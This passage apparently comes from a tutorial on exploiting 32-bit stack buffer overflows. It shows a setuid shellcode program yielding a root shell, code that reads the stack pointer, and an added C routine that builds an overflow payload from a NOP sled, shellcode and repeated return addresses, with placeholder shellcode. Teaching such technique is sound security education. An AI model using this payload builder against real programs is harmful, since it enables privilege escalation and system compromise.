#chmod u+s shellcode
#su joeuser //switch to a normal user (any)
$./shellcode
sh-2.05b#
It worked: we got a root shell prompt.
Repeating Return Addresses
The most important element of the exploit is the return address, which must be aligned
on a 4-byte boundary and repeated until it overwrites the saved eip value on the stack. Although it is
possible to point directly at the beginning of the shellcode, it is usually much easier to be a
little sloppy and point somewhere in the middle of the NOP sled, so that being off by a few
bytes still lands on a NOP. To do that, the first thing you need to know is the current esp
value, which points to the top of the stack. gcc lets you embed assembly inline, so a small
program can read esp directly and print it:
#include <stdio.h>
/* Copy esp into eax; eax is the 32-bit return register, so the caller
   receives the stack pointer. This trick only works for 32-bit code: on a
   64-bit host build with gcc -m32. */
unsigned long get_sp(void){
__asm__("movl %esp, %eax");
}
int main(){
printf("Stack pointer (ESP): 0x%x\n", get_sp());
return 0;
}
# gcc -o get_sp get_sp.c
# ./get_sp
Stack pointer (ESP): 0xbffffbd8 //remember that number for later
Remember that esp value; we will use it soon as our return address, though yours will be
different.
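The layout described above (NOP sled, then shellcode, then the return address repeated on 4-byte boundaries until it covers the saved eip) is easy to get wrong by a byte or two, so here is an added example, not code from the original text, that builds such a buffer and lets you inspect the alignment before using it. The esp value 0xbffffbd8 is the one printed above; the sled offset of 300, the buffer size of 600 and the 0xcc "shellcode" are constructed placeholders, and the helper names are my own. It assumes, as the text does, that the saved eip sits at a 4-byte-aligned offset from the start of the overflowed buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Builds the classic stack-overflow payload laid out as
 *   [ NOP sled ][ shellcode ][ NOP pad to 4-byte boundary ][ ret ret ret ... ]
 * ret is written little-endian (x86), and every copy starts on a 4-byte
 * boundary measured from the start of buf, so that whichever copy lands on
 * the saved eip is read back as a clean, aligned 32-bit value.
 *
 * Assumption (not from the original text): the saved eip lies at an offset
 * from the start of the overflowed buffer that is a multiple of 4, so len
 * must be a multiple of 4 as well.
 *
 * Returns the number of return-address copies written, or -1 on error.
 */
int build_payload(unsigned char *buf, size_t len,
                  const unsigned char *shellcode, size_t sclen,
                  size_t sled_len, uint32_t ret)
{
    size_t body = sled_len + sclen;
    size_t aligned_body = (body + 3) & ~(size_t)3; /* next 4-byte boundary */
    size_t pos;
    int copies = 0;

    if (len % 4 != 0)
        return -1;
    if (aligned_body + 4 > len)        /* need room for at least one ret */
        return -1;

    memset(buf, 0x90, sled_len);       /* NOP sled */
    pos = sled_len;
    memcpy(buf + pos, shellcode, sclen);
    pos += sclen;
    while (pos < aligned_body)         /* pad to alignment with NOPs */
        buf[pos++] = 0x90;

    for (; pos + 4 <= len; pos += 4, copies++) {
        buf[pos]     = (unsigned char)(ret & 0xff);
        buf[pos + 1] = (unsigned char)((ret >> 8) & 0xff);
        buf[pos + 2] = (unsigned char)((ret >> 16) & 0xff);
        buf[pos + 3] = (unsigned char)((ret >> 24) & 0xff);
    }
    return copies;
}

/* Choose a return address that points into the middle of the NOP sled:
 * the esp value read by get_sp minus an offset back into the sled. */
uint32_t sled_target(uint32_t esp, uint32_t offset)
{
    return esp - offset;
}

/* Read back the 32-bit little-endian word at an offset, as the CPU would
 * when it pops the saved eip. */
uint32_t word_at(const unsigned char *buf, size_t off)
{
    return (uint32_t)buf[off] | ((uint32_t)buf[off + 1] << 8) |
           ((uint32_t)buf[off + 2] << 16) | ((uint32_t)buf[off + 3] << 24);
}

/* Constructed stand-in for shellcode (int3 breakpoints), not a working payload */
static const unsigned char stub_shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc, 0xcc };

int main(void)
{
    unsigned char buf[600];
    /* esp from the text, minus 300 bytes so we land inside the 200-byte sled */
    uint32_t ret = sled_target(0xbffffbd8u, 300);
    int n = build_payload(buf, sizeof buf, stub_shellcode,
                          sizeof stub_shellcode, 200, ret);

    printf("return address 0x%08x repeated %d times\n", ret, n);
    printf("last word in buffer: 0x%08x\n", word_at(buf, sizeof buf - 4));
    return 0;
}
```

If the saved eip turns out to sit at an offset that is not a multiple of 4 from the buffer start, the fix is to prepend that many bytes of NOPs before calling build_payload rather than to shift the return-address copies, because the copies must stay aligned with the slot they overwrite.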
At this point, it may be helpful to check whether your system has Address Space Layout
Randomization (ASLR) turned on. You can check this easily by running the get_sp program
several times in a row: if the printed esp value changes between runs, ASLR is active and a
hard-coded return address will not be reliable. On Linux the setting is also visible in
/proc/sys/kernel/randomize_va_space, where 0 means randomization is disabled.